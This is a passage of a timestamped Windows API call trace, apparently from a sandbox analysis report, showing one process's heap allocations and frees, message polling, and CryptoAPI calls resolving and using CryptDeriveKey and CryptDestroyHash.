hHeap=0x970000) returned 1 [0264.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55128 [0264.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0264.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55248 [0264.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55278 [0264.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0264.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0264.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55248 | out: hHeap=0x970000) returned 1 [0264.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0264.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0264.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0264.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55278 [0264.878] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0264.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e51c28 [0264.878] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e51c28, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0264.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0264.879] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0264.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0264.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0264.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0264.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55138 [0264.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551b8 [0264.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55288 [0264.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55148 [0264.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551e8 [0264.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55138 | out: hHeap=0x970000) returned 1 [0264.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551b8 | out: hHeap=0x970000) returned 1 [0264.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55288 | out: hHeap=0x970000) returned 1 [0264.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55148 | out: hHeap=0x970000) returned 1 [0264.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551e8 | out: hHeap=0x970000) returned 1 [0264.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0264.879] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa872d0, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87250) returned 1 [0264.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f15c40 [0264.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0264.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551e8 [0264.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0264.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0264.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0264.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551f8 [0264.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0264.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0264.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0264.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0264.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0264.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0264.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55138 [0264.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0264.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55138 | out: hHeap=0x970000) returned 1 [0264.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0264.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0264.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0264.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0264.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55278 [0264.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0264.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0264.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0264.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0264.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0264.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51fe8 [0264.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55278 [0264.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51fe8 | out: hHeap=0x970000) returned 1 [0264.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0264.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0264.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0264.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520a8 [0264.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f58 [0264.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552b8 [0264.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f58 | out: hHeap=0x970000) returned 1 [0264.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552b8 | out: hHeap=0x970000) returned 1 [0264.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520a8 | out: hHeap=0x970000) returned 1 [0264.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520d8 [0264.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f58 [0264.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51fd0 [0264.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551f8 [0264.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51fd0 | out: hHeap=0x970000) returned 1 [0264.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0264.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f58 | out: hHeap=0x970000) returned 1 [0264.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55268 | out: hHeap=0x970000) returned 1 [0264.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551d8 | out: hHeap=0x970000) returned 1 [0264.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552f8 | out: hHeap=0x970000) returned 1 [0264.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55238 | out: hHeap=0x970000) returned 1 [0264.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55128 | out: hHeap=0x970000) returned 1 [0264.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0264.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0264.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551c8 | out: hHeap=0x970000) returned 1 [0264.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0264.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0264.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0264.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0264.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0264.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0264.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0264.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0264.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0264.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0264.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0264.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0264.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0264.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0264.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0264.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0264.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0264.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0264.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0264.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0264.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0264.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551a8 | out: hHeap=0x970000) returned 1 [0264.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0264.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0264.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0264.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55118 | out: hHeap=0x970000) returned 1 [0264.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0264.883] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55298 [0264.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55138 [0264.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552e8 [0264.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0264.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551b8 [0264.883] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.884] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551f8 [0264.884] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0264.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0264.884] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0264.884] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0264.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0264.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0264.884] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0264.886] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0264.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0264.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0264.887] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0264.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0264.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0264.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0264.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0264.887] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0264.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69a68 [0264.887] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69a68, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0264.887] CryptDestroyHash (hHash=0xa872d0) returned 1 [0264.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f15c40 [0264.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0264.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0264.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0264.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0264.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0264.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0264.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0264.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0264.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0264.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0264.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0264.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0264.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0264.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0264.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0264.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0264.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0264.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0264.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0264.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0264.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0264.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0264.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0264.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0264.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0264.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0264.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0264.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0264.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0264.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0264.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0264.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0264.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0264.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f15c40 | out: hHeap=0x970000) returned 1 [0264.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0264.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0264.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0264.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0264.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0264.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0264.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0264.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0264.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0264.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0264.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0264.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0264.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0264.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0264.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0264.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0264.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0264.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0264.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0264.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0264.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0264.889] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0264.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0264.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0264.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0264.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0264.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0264.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0264.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0264.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0264.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0264.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0264.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0264.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0264.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0264.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0264.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0264.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0264.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0264.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0264.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0264.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0264.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0264.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0264.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0264.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0264.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0264.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0264.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0264.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0264.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0264.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0264.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0264.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520d8 | out: hHeap=0x970000) returned 1 [0264.890] HeapFree (in: 